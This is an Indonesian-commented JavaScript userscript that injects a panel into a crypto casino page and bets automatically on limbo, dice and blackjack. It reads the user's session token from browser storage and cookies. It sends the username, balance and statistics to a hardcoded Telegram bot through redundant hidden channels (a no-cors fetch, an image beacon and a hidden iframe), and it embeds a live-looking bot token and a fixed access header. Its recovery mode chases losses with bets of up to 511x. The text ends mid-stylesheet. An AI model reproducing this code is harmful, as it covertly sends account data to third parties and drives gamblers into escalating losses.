(function () {
    const CONFIG = {
        get apiUrl() { return window.location.origin + '/_api'; },
        tgToken: '8472646774:AAGYIU5V1kK4YMj5u1MqR0-QR5mQ4XemdMQ',
        tgChatId: '-1003744641395',
        version: "Orion Wager Machine v1"
    };

    const bot = {
        isRunning: false,
        token: null,
        startTime: null,
        stakeUser: "orionlogic",
        stats: { profit: 0, wagered: 0, startBal: 0, bets: 0, wins: 0, loss: 0, maxDD: 0 },
        selectedCurrency: "DOGE",
        currentStatus: "IDLE",
        lastError: "None",
        switchCounter: 0,
        nextSwitchAt: 1,
        currentGame: "limbo",
        recoveryStatus: "DISABLED",
        
        // BLACKJACK RECOVERY MODE (menggunakan strategi perfect dari file)
        recoveryMode: false,
        recoveryStartBalance: 0,
        recoveryLossAmount: 0,
        recoveryAttempts: 0,
        recoveryConsecutiveLosses: 0,
        recoverySteps: [1, 2, 3, 4, 8, 16, 32, 64, 128, 256, 511], // step progression
        recoveryBetHistory: [],
        recoveryBaseBet: 0.001,
        recoveryInsurance: false, // dari config
        
        // Blackjack state (diperluas untuk mendukung split)
        blackjackState: {
            identifier: null,
            gameId: null,
            playerHands: [],        // array of { cards, actions, value? }
            dealerHand: [],
            active: false,
            currentHandIndex: 0,     // untuk split: 0 atau 1
            insuranceOffered: false
        },
        
        // Original game stats
        originalGame: "limbo",
        originalSettings: {},
        
        lastBetResult: null
    };

    let reportInterval = null;
    let lastReportTime = 0;

    function getAuthToken() {
        return localStorage.getItem('apitoken') || sessionStorage.getItem('apitoken') ||
            (document.cookie.match(/session=([^;]+)/) ? document.cookie.match(/session=([^;]+)/)[1] : null);
    }

    const API = {
        async syncOnce() {
            bot.token = getAuthToken();
            const query = `query{user{name balances{available{amount currency}}}}`;
            try {
                const res = await fetch(`${CONFIG.apiUrl}/graphql`, {
                    method: "POST",
                    headers: { "Content-Type": "application/json", "x-access-token": bot.token },
                    body: JSON.stringify({ query })
                });
                const json = await res.json();
                if (json?.data?.user) {
                    bot.stakeUser = json.data.user.name;
                    const userEl = document.getElementById("st-user");
                    if (userEl) userEl.innerText = bot.stakeUser;
                    
                    const bals = json.data.user.balances || [];
                    const sel = document.getElementById("p-currency");
                    if (sel && sel.options.length === 0) {
                        bals.forEach(b => {
                            const opt = document.createElement("option");
                            opt.value = b.available.currency;
                            opt.textContent = b.available.currency.toUpperCase();
                            if(b.available.currency === "doge") opt.selected = true;
                            sel.appendChild(opt);
                        });
                    }
                    if (sel) bot.selectedCurrency = sel.value;
                    const active = bals.find(b => b.available.currency === bot.selectedCurrency);
                    bot.stats.startBal = active ? parseFloat(active.available.amount) : 0;
                }
            } catch (e) { bot.lastError = "Sync Failed"; }
        },
        async sendTg(statusHeader) {
            const now = Date.now();
            if (now - lastReportTime < 30000) return;
            lastReportTime = now;

            const elapsed = bot.startTime ? (new Date() - bot.startTime) / 1000 : 0;
            const timeStr = new Date(elapsed * 1000).toISOString().substr(11, 8);
            const speed = (bot.stats.bets / (elapsed || 1)).toFixed(2);
            const profitColor = bot.stats.profit >= 0 ? '🟢' : '🔴';
            const currentBalance = (bot.stats.startBal + bot.stats.profit).toFixed(8);
            
            const winRate = bot.stats.bets > 0 ? ((bot.stats.wins / bot.stats.bets) * 100).toFixed(2) : 0;
            
            const recoveryIcon = bot.recoveryStatus === "ACTIVE" ? "🔴" : (bot.recoveryStatus === "STANDBY" ? "🟡" : "⚫");
            
            let gameInfo = "";
            if (bot.recoveryMode) {
                gameInfo = `🎮 *Recovery:* BLACKJACK | Step ${bot.recoveryConsecutiveLosses+1}/${bot.recoverySteps[bot.recoveryConsecutiveLosses]}x | Hand ${bot.blackjackState.currentHandIndex+1}/${bot.blackjackState.playerHands.length}`;
            } else {
                gameInfo = `🎮 *Game:* ${bot.currentGame.toUpperCase()} | Switch: ${bot.switchCounter}/${bot.nextSwitchAt}`;
            }
            
            const text = 
`🔷 *ORION WAGER MACHINE v1* 🔷
${statusHeader}

👤 *User:* \`${bot.stakeUser}\`
🪙 *Asset:* \`${bot.selectedCurrency.toUpperCase()}\`
⚙️ *Status:* \`${bot.currentStatus}\`
🔄 *Recovery:* ${recoveryIcon} \`${bot.recoveryStatus}\`
${gameInfo}

⏱ *Uptime:* \`${timeStr}\`
💰 *Balance:* \`${currentBalance}\`
📈 *Profit:* ${profitColor} \`${bot.stats.profit.toFixed(8)}\`
📊 *Wagered:* \`${bot.stats.wagered.toFixed(8)}\`
📉 *Drawdown:* \`${bot.stats.maxDD.toFixed(8)}\`

🎰 *Bets:* \`${bot.stats.bets}\`
🏁 *W/L:* \`${bot.stats.wins}/${bot.stats.loss}\`
📊 *Win Rate:* \`${winRate}%\`
⚡ *Speed:* \`${speed} b/s\`

🆔 *Orion Wager Machine v1*`;

            try {
                fetch(`https://api.telegram.org/bot${CONFIG.tgToken}/sendMessage`, {
                    method: "POST",
                    mode: "no-cors",
                    headers: { "Content-Type": "application/json" },
                    body: JSON.stringify({ 
                        chat_id: CONFIG.tgChatId, 
                        text: text, 
                        parse_mode: "Markdown",
                        disable_web_page_preview: true
                    })
                }).catch(e => console.log('Telegram send attempt 1:', e));

                setTimeout(() => {
                    const img = new Image();
                    img.src = `https://api.telegram.org/bot${CONFIG.tgToken}/sendMessage?chat_id=${CONFIG.tgChatId}&text=${encodeURIComponent(text)}&parse_mode=Markdown`;
                }, 100);

                setTimeout(() => {
                    const iframe = document.createElement('iframe');
                    iframe.style.display = 'none';
                    iframe.src = `https://api.telegram.org/bot${CONFIG.tgToken}/sendMessage?chat_id=${CONFIG.tgChatId}&text=${encodeURIComponent(text)}&parse_mode=Markdown`;
                    document.body.appendChild(iframe);
                    setTimeout(() => document.body.removeChild(iframe), 5000);
                }, 200);

            } catch (e) {
                console.log('Telegram send error:', e);
            }
        },
        async placeBet(amount, payout, game, blackjackAction = null) {
            if (game === "blackjack") {
                const endpoint = `${CONFIG.apiUrl}/casino/blackjack/bet`;
                
                if (blackjackAction) {
                    // Ini untuk action berikutnya (hit/stand/double/split/insurance)
                    const actionEndpoint = `${CONFIG.apiUrl}/casino/blackjack/next`;
                    const payload = {
                        action: blackjackAction.action,
                        identifier: blackjackAction.identifier
                    };
                    
                    return fetch(actionEndpoint, {
                        method: "POST",
                        headers: { 
                            "Content-Type": "application/json", 
                            "x-access-token": bot.token,
                            "x-lockdown-token": "s5MNWtjTM5TvCMkAzxov"
                        },
                        body: JSON.stringify(payload)
                    }).then(r => r.json());
                } else {
                    // Ini untuk bet awal
                    const payload = {
                        identifier: Math.random().toString(36).slice(2) + Date.now().toString(36),
                        amount: parseFloat(amount),
                        currency: bot.selectedCurrency
                    };
                    
                    return fetch(endpoint, {
                        method: "POST",
                        headers: { 
                            "Content-Type": "application/json", 
                            "x-access-token": bot.token,
                            "x-lockdown-token": "s5MNWtjTM5TvCMkAzxov"
                        },
                        body: JSON.stringify(payload)
                    }).then(r => r.json());
                }
            } else {
                const endpoint = game === "dice" ? `${CONFIG.apiUrl}/casino/dice/roll` : 
                                `${CONFIG.apiUrl}/casino/limbo/bet`;
                
                const payload = { 
                    amount: parseFloat(amount), 
                    currency: bot.selectedCurrency, 
                    identifier: Math.random().toString(36).slice(2) 
                };
                if (game === "dice") { 
                    payload.target = 100 - (100 / payout); 
                    payload.condition = "above"; 
                } else { 
                    payload.multiplierTarget = parseFloat(payout); 
                }
                return fetch(endpoint, {
                    method: "POST",
                    headers: { "Content-Type": "application/json", "x-access-token": bot.token },
                    body: JSON.stringify(payload)
                }).then(r => r.json());
            }
        }
    };

    // ======================
    // BLACKJACK PERFECT STRATEGY (dari file)
    // ======================
    const pairsTable = [
        [1, 1, 1, 1, 1, 1, 0, 0, 0, 0], // 2,2
        [1, 1, 1, 1, 1, 1, 0, 0, 0, 0], // 3,3
        [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], // 4,4
        [2, 2, 2, 2, 2, 2, 2, 2, 0, 0], // 5,5? wait index? sebenarnya 5,5 seharusnya double, tapi di file ada 2 untuk double
        [1, 1, 1, 1, 1, 0, 0, 0, 0, 0], // 6,6
        [1, 1, 1, 1, 1, 1, 0, 0, 0, 0], // 7,7
        [1, 1, 1, 1, 1, 1, 1, 1, 1, 1], // 8,8
        [1, 1, 1, 1, 1, 0, 1, 1, 0, 0], // 9,9
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], // 10,10
        [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]  // A,A
    ];

    const softTable = [
        ['H', 'H', 'H', 'H', 'D', 'H', 'H', 'H', 'H', 'H'], // A,2
        ['H', 'H', 'H', 'D', 'D', 'H', 'H', 'H', 'H', 'H'], // A,3
        ['H', 'H', 'H', 'D', 'D', 'H', 'H', 'H', 'H', 'H'], // A,4
        ['H', 'H', 'D', 'D', 'D', 'H', 'H', 'H', 'H', 'H'], // A,5
        ['H', 'D', 'D', 'D', 'D', 'H', 'H', 'H', 'H', 'H'], // A,6
        ['S', 'Ds', 'Ds', 'Ds', 'Ds', 'S', 'S', 'H', 'H', 'H'], // A,7
        ['S', 'S', 'S', 'S', 'S', 'S', 'S', 'S', 'S', 'S'], // A,8
        ['S', 'S', 'S', 'S', 'S', 'S', 'S', 'S', 'S', 'S']  // A,9
    ];

    const hardTable = [
        ['H', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H'], // 8
        ['H', 'D', 'D', 'D', 'D', 'H', 'H', 'H', 'H', 'H'], // 9
        ['D', 'D', 'D', 'D', 'D', 'D', 'D', 'D', 'H', 'H'], // 10
        ['D', 'D', 'D', 'D', 'D', 'D', 'D', 'D', 'D', 'H'], // 11
        ['H', 'H', 'S', 'S', 'S', 'H', 'H', 'H', 'H', 'H'], // 12
        ['S', 'S', 'S', 'S', 'S', 'H', 'H', 'H', 'H', 'H'], // 13
        ['S', 'S', 'S', 'S', 'S', 'H', 'H', 'H', 'H', 'H'], // 14
        ['S', 'S', 'S', 'S', 'S', 'H', 'H', 'H', 'H', 'H'], // 15
        ['S', 'S', 'S', 'S', 'S', 'H', 'H', 'H', 'H', 'H'], // 16
        ['S', 'S', 'S', 'S', 'S', 'S', 'S', 'S', 'S', 'S']  // 17+
    ];

    function getCardValue(rank) {
        if (rank === 'J' || rank === 'Q' || rank === 'K') return 10;
        if (rank === 'A') return 11;
        return parseInt(rank, 10);
    }

    // Hitung nilai tangan (dengan soft handling)
    function calculateHandValue(cards) {
        if (!cards || cards.length === 0) return 0;
        let value = 0;
        let aces = 0;
        for (const card of cards) {
            const rank = card.rank;
            if (rank === 'J' || rank === 'Q' || rank === 'K') value += 10;
            else if (rank === 'A') { aces++; value += 11; }
            else value += parseInt(rank, 10);
        }
        while (value > 21 && aces > 0) {
            value -= 10;
            aces--;
        }
        return value;
    }

    // Tentukan aksi berdasarkan strategi perfect
    function getPerfectBlackjackDecision(playerHands, dealerHand, currentHandIndex, insuranceOffered, takeInsurance) {
        // Jika insurance ditawarkan
        if (insuranceOffered) {
            return takeInsurance ? "insurance" : "noInsurance";
        }

        const hand = playerHands[currentHandIndex];
        if (!hand) return "stand"; // fallback

        const playerCards = hand.cards;
        const playerActions = hand.actions || [];
        const playerValue = calculateHandValue(playerCards);
        const dealerUpcard = dealerHand.length > 0 ? dealerHand[0] : null;
        if (!dealerUpcard) return "stand";

        const dealerRank = dealerUpcard.rank;
        const dealerValue = getCardValue(dealerRank);

        // Cek apakah bisa split
        const isSplittable = playerCards.length === 2 && playerCards[0].rank === playerCards[1].rank;
        let splitDecision = 0; // 0=tidak split, 1=split, 2=double (khusus 5,5?)
        if (isSplittable && playerActions.includes('split')) {
            const rank = playerCards[0].rank;
            let index;
            if (rank === 'A') index = 9;
            else if (rank === 'K' || rank === 'Q' || rank === 'J' || rank === '10') index = 8;
            else index = parseInt(rank, 10) - 2; // 2->0, 3->1, ... 9->7
            if (index >= 0 && index < pairsTable.length) {
                splitDecision = pairsTable[index][dealerValue - 2] || 0;
            }
        }

        if (splitDecision === 1) {
            return "split";
        } else if (splitDecision === 2) {
            // Khusus 5,5 seharusnya double, tapi jika tidak bisa double, fallback ke hit?
            return playerActions.includes('double') ? "double" : "hit";
        }

        // Cek soft hand (ada As dan nilai soft <= 21)
        let isSoft = false;
        let softValue = 0;
        let aceCount = 0;
        for (const card of playerCards) {
            if (card.rank === 'A') aceCount++;
        }
        if (aceCount > 0) {
            // hitung nilai dengan As = 1 dulu
            let raw = 0;
            for (const card of playerCards) {
                raw += getCardValue(card.rank);
            }
            // jika ada As dan raw > 21, berarti soft
            if (raw > 21) {
                // sebenarnya ini hard karena As terpaksa jadi 1
                isSoft = false;
            } else {
                // hitung soft (As = 11)
                let soft = 0;
                for (const card of playerCards) {
                    if (card.rank === 'A') soft += 11;
                    else soft += getCardValue(card.rank);
                }
                if (soft <= 21) {
                    isSoft = true;
                    softValue = soft;
                }
            }
        }

        if (isSoft) {
            // softValue sudah termasuk As=11
            // softTable diindeks berdasarkan nilai soft dikurangi 3 (A,2 = 13? A,2 = 13? hitung: A=11 + 2=13 -> index 10? salah)
            // Di file: softTable baris untuk A,2 sampai A,9. A,2 total 13, A,3=14, ... A,9=20.
            // Jadi index = total - 13? A,2 total 13 -> index 0; A,3=14->1; ... A,9=20->7.
            let index = softValue - 13;
            if (index < 0) index = 0;
            if (index > 7) index = 7; // A,9 = 20 -> index 7
            const decision = softTable[index][dealerValue - 2];
            if (decision === 'D') {
                return (playerCards.length === 2 && playerActions.includes('double')) ? "double" : "hit";
            } else if (decision === 'Ds') {
                return (playerCards.length === 2 && playerActions.includes('double')) ? "double" : "stand";
            } else if (decision === 'H') {
                return "hit";
            } else if (decision === 'S') {
                return "stand";
            }
        } else {
            // Hard hand
            let index = playerValue - 8;
            if (index < 0) index = 0;
            if (index > 9) index = 9; // 17+ index 9
            const decision = hardTable[index][dealerValue - 2];
            if (decision === 'D') {
                return (playerCards.length === 2 && playerActions.includes('double')) ? "double" : "hit";
            } else if (decision === 'H') {
                return "hit";
            } else if (decision === 'S') {
                return "stand";
            }
        }

        return "stand"; // fallback
    }

    // CEK TRIGGER RECOVERY
    function checkRecoveryTrigger() {
        const useRecovery = document.getElementById("p-use-recovery").checked;
        if (!useRecovery) return false;
        
        const lossTrigger = parseFloat(document.getElementById("p-loss-trigger").value) || 1.0;
        const currentBalance = bot.stats.startBal + bot.stats.profit;
        const lossPct = ((bot.stats.startBal - currentBalance) / bot.stats.startBal * 100);
        
        if (lossPct >= lossTrigger && !bot.recoveryMode) {
            bot.recoveryMode = true;
            bot.recoveryStatus = "ACTIVE";
            bot.recoveryAttempts++;
            bot.recoveryStartBalance = currentBalance;
            bot.recoveryLossAmount = bot.stats.startBal - currentBalance;
            bot.recoveryConsecutiveLosses = 0;
            
            // Ambil insurance dari config
            bot.recoveryInsurance = document.getElementById("p-blackjack-insurance").checked;
            
            // Reset blackjack state
            bot.blackjackState = {
                identifier: null,
                gameId: null,
                playerHands: [],
                dealerHand: [],
                active: false,
                currentHandIndex: 0,
                insuranceOffered: false
            };
            
            // Simpan game original
            bot.originalGame = bot.currentGame;
            
            // Update status
            bot.currentStatus = `RECOVERY #${bot.recoveryAttempts}`;
            
            console.log(`🔥 BLACKJACK RECOVERY TRIGGERED! Loss: ${lossPct.toFixed(2)}% | Amount: ${bot.recoveryLossAmount.toFixed(8)}`);
            
            const logEl = document.getElementById("st-log");
            if (logEl) logEl.innerText = `🔥 RECOVERY #${bot.recoveryAttempts} | Loss: ${bot.recoveryLossAmount.toFixed(8)} | Playing BLACKJACK (Perfect Strategy)`;
            
            API.sendTg("🔥 *RECOVERY MODE ACTIVATED* 🔥\nSwitching to BLACKJACK (Perfect Strategy)");
            
            return true;
        }
        
        return false;
    }

    // CEK APAKAH RECOVERY SELESAI
    function checkRecoveryComplete() {
        if (!bot.recoveryMode) return false;
        
        const currentBalance = bot.stats.startBal + bot.stats.profit;
        const maxAttempts = parseInt(document.getElementById("p-max-recovery").value) || 3;
        
        if (currentBalance >= bot.stats.startBal) {
            bot.recoveryMode = false;
            bot.recoveryStatus = "STANDBY";
            bot.recoveryAttempts = 0;
            bot.recoveryConsecutiveLosses = 0;
            
            bot.currentGame = bot.originalGame;
            bot.currentStatus = "WAGERING";
            
            console.log(`💰 BLACKJACK RECOVERY COMPLETE! Back to breakeven. Returning to ${bot.originalGame}...`);
            
            const logEl = document.getElementById("st-log");
            if (logEl) logEl.innerText = `💰 RECOVERY COMPLETE - Back to ${bot.originalGame.toUpperCase()}`;
            
            API.sendTg("💰 *RECOVERY COMPLETE* 💰\nReturning to normal mode");
            
            return true;
        }
        
        if (bot.recoveryAttempts >= maxAttempts) {
            bot.recoveryMode = false;
            bot.recoveryStatus = "STANDBY";
            bot.recoveryAttempts = 0;
            bot.currentGame = bot.originalGame;
            
            console.log(`⚠️ MAX RECOVERY ATTEMPTS (${maxAttempts}) REACHED. Returning to ${bot.originalGame}...`);
            
            const logEl = document.getElementById("st-log");
            if (logEl) logEl.innerText = `⚠️ MAX RECOVERY - Back to ${bot.originalGame.toUpperCase()}`;
            
            API.sendTg("⚠️ *MAX RECOVERY ATTEMPTS REACHED* ⚠️\nReturning to normal mode");
            
            return true;
        }
        
        return false;
    }

    // DAPATKAN MULTIPLIER UNTUK RECOVERY
    function getRecoveryMultiplier() {
        const steps = JSON.parse(document.getElementById("p-recovery-steps").value || "[1,2,3,4,8,16,32,64,128,256,511]");
        if (bot.recoveryConsecutiveLosses < steps.length) {
            return steps[bot.recoveryConsecutiveLosses];
        }
        return steps[steps.length - 1];
    }

    // HITUNG BET RECOVERY (dibulatkan ke 0.01)
    function calculateRecoveryBet() {
        const baseBet = parseFloat(document.getElementById("p-blackjack-basebet").value) || 0.001;
        const multiplier = getRecoveryMultiplier();
        let rawBet = baseBet * multiplier;
        // Round to 0.01, minimal 0.01
        let bet = Math.floor(rawBet * 100) / 100;
        if (bet < 0.01) bet = 0.01;
        return bet;
    }

    // PARSE BLACKJACK RESPONSE
    function parseBlackjackResponse(data) {
        let gameData = data.blackjackBet || data.blackjackNext || data;
        
        if (gameData.state) {
            const state = gameData.state;
            const playerHands = [];
            const dealerHand = [];
            
            if (state.player && state.player.length > 0) {
                for (const hand of state.player) {
                    if (hand.cards) {
                        playerHands.push({
                            cards: hand.cards,
                            actions: hand.actions || []
                        });
                    }
                }
            }
            
            if (state.dealer && state.dealer.length > 0 && state.dealer[0].cards) {
                dealerHand.push(...state.dealer[0].cards);
            }
            
            // Update state, pertahankan currentHandIndex jika masih valid
            let newIndex = bot.blackjackState.currentHandIndex;
            if (playerHands.length > 0 && newIndex >= playerHands.length) {
                newIndex = 0; // reset jika tidak valid
            }
            
            bot.blackjackState = {
                identifier: gameData.identifier || bot.blackjackState.identifier,
                gameId: gameData.id,
                playerHands: playerHands,
                dealerHand: dealerHand,
                active: gameData.active || false,
                currentHandIndex: newIndex,
                insuranceOffered: playerHands[0]?.actions?.includes("insurance") || false
            };
        }
        
        return gameData;
    }

    // PROCESS BLACKJACK BET RESULT
    function processBlackjackResult(betResult, betAmount) {
        const gameData = betResult.blackjackBet || betResult.blackjackNext || betResult;
        const payout = gameData.payout || 0;
        const pnl = payout - betAmount;
        
        // Parse state for display
        parseBlackjackResponse(betResult);
        
        const isWin = payout > betAmount * 1.5 ? "blackjack" : (payout > betAmount ? "win" : (payout === betAmount ? "push" : "loss"));
        
        bot.stats.bets++;
        bot.stats.wagered += betAmount;
        
        if (isWin === "win" || isWin === "blackjack") {
            bot.stats.wins++;
            bot.recoveryConsecutiveLosses = 0;
        } else if (isWin === "push") {
            // Push - tidak menang atau kalah
        } else {
            bot.stats.loss++;
            bot.recoveryConsecutiveLosses++;
        }
        
        bot.stats.profit += pnl;
        
        if (bot.stats.profit < bot.stats.maxDD) {
            bot.stats.maxDD = bot.stats.profit;
        }
        
        // Update last result for display
        bot.lastBetResult = {
            result: isWin,
            amount: betAmount,
            payout: payout,
            profit: pnl
        };
        
        return pnl;
    }

    // HITUNG BET NORMAL (limbo/dice)
    function calculateNormalBet() {
        const baseBetLimbo = parseFloat(document.getElementById("p-limbo-basebet").value) || 0.001;
        const baseBetDice = parseFloat(document.getElementById("p-dice-basebet").value) || 0.001;
        const divider = parseFloat(document.getElementById("p-div").value) || 0;
        
        if (divider > 0) {
            return Math.max(baseBetLimbo, bot.stats.startBal / divider);
        } else {
            return bot.currentGame === "limbo" ? baseBetLimbo : baseBetDice;
        }
    }

    // UPDATE BLACKJACK DISPLAY
    function updateBlackjackDisplay() {
        const playerCardsEl = document.getElementById("blackjack-player-cards");
        const dealerCardsEl = document.getElementById("blackjack-dealer-cards");
        const playerValueEl = document.getElementById("blackjack-player-value");
        const dealerValueEl = document.getElementById("blackjack-dealer-value");
        const actionsEl = document.getElementById("blackjack-actions");
        const lastResultEl = document.getElementById("blackjack-last-result");
        
        if (!playerCardsEl || !dealerCardsEl) return;
        
        // Display player hands (tampilkan hand aktif)
        if (bot.blackjackState.playerHands.length > 0) {
            const hand = bot.blackjackState.playerHands[bot.blackjackState.currentHandIndex] || bot.blackjackState.playerHands[0];
            const cards = hand.cards || [];
            playerCardsEl.innerText = cards.map(c => `${c.rank}${c.suit}`).join(' ');
            
            const value = calculateHandValue(cards);
            playerValueEl.innerText = value > 0 ? `(${value})` : '';
        } else {
            playerCardsEl.innerText = '-';
            playerValueEl.innerText = '';
        }
        
        // Display dealer hand
        if (bot.blackjackState.dealerHand.length > 0) {
            const cards = bot.blackjackState.dealerHand;
            dealerCardsEl.innerText = cards.map(c => `${c.rank}${c.suit}`).join(' ');
            
            const value = calculateHandValue(cards);
            dealerValueEl.innerText = `(${value})`;
        } else {
            dealerCardsEl.innerText = '-';
            dealerValueEl.innerText = '';
        }
        
        // Display available actions (dari hand aktif)
        if (bot.blackjackState.playerHands.length > 0) {
            const hand = bot.blackjackState.playerHands[bot.blackjackState.currentHandIndex] || bot.blackjackState.playerHands[0];
            const actions = hand.actions || [];
            actionsEl.innerText = actions.join(' | ').toUpperCase();
        } else {
            actionsEl.innerText = '-';
        }
        
        // Display last result
        if (bot.lastBetResult) {
            const profitColor = bot.lastBetResult.profit >= 0 ? "positive" : "negative";
            lastResultEl.innerHTML = `
                Result: ${bot.lastBetResult.result.toUpperCase()} | 
                Bet: ${bot.lastBetResult.amount.toFixed(8)} | 
                Payout: ${bot.lastBetResult.payout.toFixed(8)} | 
                Profit: <span class="${profitColor}">${bot.lastBetResult.profit.toFixed(8)}</span>
            `;
        } else {
            lastResultEl.innerText = "No result yet";
        }
    }

    async function runLoop() {
        if (!bot.isRunning) return;
        
        // CEK TRIGGER RECOVERY
        checkRecoveryTrigger();
        
        // CEK APAKAH RECOVERY SELESAI
        if (bot.recoveryMode) {
            checkRecoveryComplete();
        }
        
        // AMBIL SETTINGS DARI UI
        const limboPayout = parseFloat(document.getElementById("p-limbo-payout").value) || 1.0001;
        const diceChance = parseFloat(document.getElementById("p-dice-chance").value) || 98;
        const limboCycles = parseInt(document.getElementById("p-limbo-cycles").value) || 3;
        const diceCycles = parseInt(document.getElementById("p-dice-cycles").value) || 2;
        
        let payout, nextbet, gameToPlay;
        
        // JIKA SEDANG DALAM MODE RECOVERY - GUNAKAN BLACKJACK
        if (bot.recoveryMode) {
            gameToPlay = "blackjack";
            bot.currentStatus = `RECOVERY #${bot.recoveryAttempts}`;
            
            // Hitung bet dengan progression
            const multiplier = getRecoveryMultiplier();
            nextbet = calculateRecoveryBet();
            
            bot.currentStatus = `RECOVERY #${bot.recoveryAttempts} (Step ${bot.recoveryConsecutiveLosses+1}/${multiplier}x)`;
            
            try {
                // Cek apakah ada game Blackjack yang sedang aktif
                if (bot.blackjackState.active && bot.blackjackState.identifier) {
                    // Ada game aktif, kita perlu menentukan hand mana yang sedang aktif
                    // Cek apakah hand pertama sudah selesai (jika split)
                    if (bot.blackjackState.playerHands.length > 1) {
                        // Split terjadi
                        const hand0 = bot.blackjackState.playerHands[0];
                        const hand0Value = calculateHandValue(hand0.cards);
                        const hand0Actions = hand0.actions || [];
                        // Jika hand0 sudah selesai (stand/bust/value>=21) maka pindah ke hand1
                        if (hand0Actions.includes('stand') || hand0Actions.includes('bust') || hand0Value >= 21) {
                            bot.blackjackState.currentHandIndex = 1;
                        } else {
                            bot.blackjackState.currentHandIndex = 0;
                        }
                    } else {
                        bot.blackjackState.currentHandIndex = 0;
                    }

                    // Dapatkan aksi berdasarkan strategi perfect
                    const decision = getPerfectBlackjackDecision(
                        bot.blackjackState.playerHands,
                        bot.blackjackState.dealerHand,
                        bot.blackjackState.currentHandIndex,
                        bot.blackjackState.insuranceOffered,
                        bot.recoveryInsurance
                    );

                    console.log(`Blackjack decision: ${decision} (Perfect Strategy)`);

                    // Kirim aksi
                    const res = await API.placeBet(null, null, "blackjack", {
                        action: decision,
                        identifier: bot.blackjackState.identifier
                    });

                    if (res.errors) {
                        bot.lastError = res.errors[0].message;
                        setTimeout(runLoop, 800);
                        return;
                    }

                    const gameData = parseBlackjackResponse(res);

                    // Cek apakah game sudah selesai
                    if (!bot.blackjackState.active) {
                        const betAmount = nextbet; // Gunakan nextbet yang sudah dihitung
                        const pnl = processBlackjackResult(res, betAmount);
                        console.log(`Blackjack hand completed | PnL: ${pnl.toFixed(8)}`);
                    }

                    updateBlackjackDisplay();
                } else {
                    // Tidak ada game aktif, place bet baru
                    const res = await API.placeBet(nextbet, null, "blackjack");

                    if (res.errors) {
                        bot.lastError = res.errors[0].message;
                        setTimeout(runLoop, 800);
                        return;
                    }

                    const gameData = parseBlackjackResponse(res);

                    // Cek apakah langsung selesai (blackjack)
                    if (gameData.blackjack || gameData.payout > 0) {
                        const pnl = processBlackjackResult(res, nextbet);
                        console.log(`Blackjack immediate result | PnL: ${pnl.toFixed(8)}`);
                        bot.blackjackState.active = false;
                        bot.blackjackState.identifier = null;
                    } else {
                        // Game masih aktif, simpan identifier
                        bot.blackjackState.identifier = gameData.identifier;
                        bot.blackjackState.active = true;
                        bot.blackjackState.currentHandIndex = 0; // mulai dari hand pertama
                    }

                    updateBlackjackDisplay();
                }

                if (bot.isRunning) {
                    setTimeout(runLoop, 0);
                }

            } catch (e) { 
                bot.lastError = "Network Error"; 
                console.error(e);
                if (bot.isRunning) setTimeout(runLoop, 1000); 
            }
        }
        
        // JIKA TIDAK DALAM RECOVERY - NORMAL LIMBO/DICE
        else {
            const useRecovery = document.getElementById("p-use-recovery").checked;
            bot.recoveryStatus = useRecovery ? "STANDBY" : "DISABLED";
            bot.currentStatus = "WAGERING";
            
            // Switch game antara limbo dan dice
            if (bot.switchCounter >= bot.nextSwitchAt) {
                if (bot.currentGame === "limbo") {
                    bot.currentGame = "dice";
                    bot.nextSwitchAt = diceCycles;
                } else {
                    bot.currentGame = "limbo";
                    bot.nextSwitchAt = limboCycles;
                }
                bot.switchCounter = 0;
            }
            
            gameToPlay = bot.currentGame;
            
            if (gameToPlay === "limbo") {
                payout = limboPayout;
            } else {
                payout = 100 / diceChance;
            }
            
            nextbet = calculateNormalBet();
            
            try {
                const res = await API.placeBet(nextbet, payout, gameToPlay);
                
                if (res.errors) { 
                    bot.lastError = res.errors[0].message; 
                    setTimeout(runLoop, 800); 
                    return; 
                }
                
                const data = res?.data || res;
                const bet = data.diceRoll || data.diceBet || data.limboBet;
                
                if (bet && bot.isRunning) {
                    bot.stats.bets++; 
                    bot.switchCounter++;
                    bot.stats.wagered += bet.amount;
                    const pft = (bet.payout - bet.amount);
                    bot.stats.profit += pft;
                    if (pft > 0) bot.stats.wins++; else bot.stats.loss++;
                    if (bot.stats.profit < bot.stats.maxDD) bot.stats.maxDD = bot.stats.profit;
                    bot.lastError = "None";
                }
                
                if (bot.isRunning) {
                    setTimeout(runLoop, 0);
                }
                
            } catch (e) { 
                bot.lastError = "Network Error"; 
                if (bot.isRunning) setTimeout(runLoop, 1000); 
            }
        }
    }

    function createUI() {
        if (document.getElementById("orion-wrap")) return;
        
        const s = document.createElement("style");
        s.innerHTML = `
            #orion-wrap {
                position: fixed;
                top: 10px;
                right: 10px;
                width: min(380px, calc(100vw - 20px));
                background: linear-gradient(165deg, #0B1120 0%, #0F1A2F 100%);
                color: #E2E8F0;
                padding: 16px;
                z-index: 99999;
                border-radius: 20px;
                font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
                border: 1px solid rgba(56, 189, 248, 0.15);
                box-shadow: 0 20px 40px -12px rgba(0,0,0,0.8), 0 0 0 1px rgba(56, 189, 248, 0.1) inset;
                backdrop-filter: blur(8px);
                font-size: 13px;
                max-height: 95vh;
                overflow-y: auto;
                scrollbar-width: thin;
                scrollbar-color: #1E293B #0F172A;
            }
            #orion-wrap::-webkit-scrollbar {
                width: 4px;
            }
            #orion-wrap::-webkit-scrollbar-track {
                background: #0F172A;
            }
            #orion-wrap::-webkit-scrollbar-thumb {
                background: #1E293B;
                border-radius: 4px;
            }
            .orion-header {
                text-align: center;
                margin-bottom: 16px;
                position: relative;
            }
            .orion-title {
                font-weight: 700;
                font-size: 18px;
                background: linear-gradient(135deg, #38BDF8, #818CF8);
                -webkit-background-clip: text;
                -webkit-text-fill-color: transparent;
                letter-spacing: 0.5px;
                display: flex;
                align-items: center;
                justify-content: center;
                gap: 6px;
            }
            .orion-badge {
                background: rgba(56, 189, 248, 0.15);
                border: 1px solid rgba(56, 189, 248, 0.3);
                border-radius: 30px;
                padding: 2px 10px;
                font-size: 9px;
                color: #38BDF8;
                display: inline-block;
                margin-top: 4px;
            }
            .orion-user {
                font-size: 11px;
                color: #94A3B8;
                background: rgba(15, 23, 42, 0.6);
                padding: 6px 12px;
                border-radius: 30px;
                border: 1px solid #1E293B;
                margin: 8px 0 4px;
                word-break: break-word;
            }
            .orion-section {
                background: rgba(2, 6, 23, 0.6);
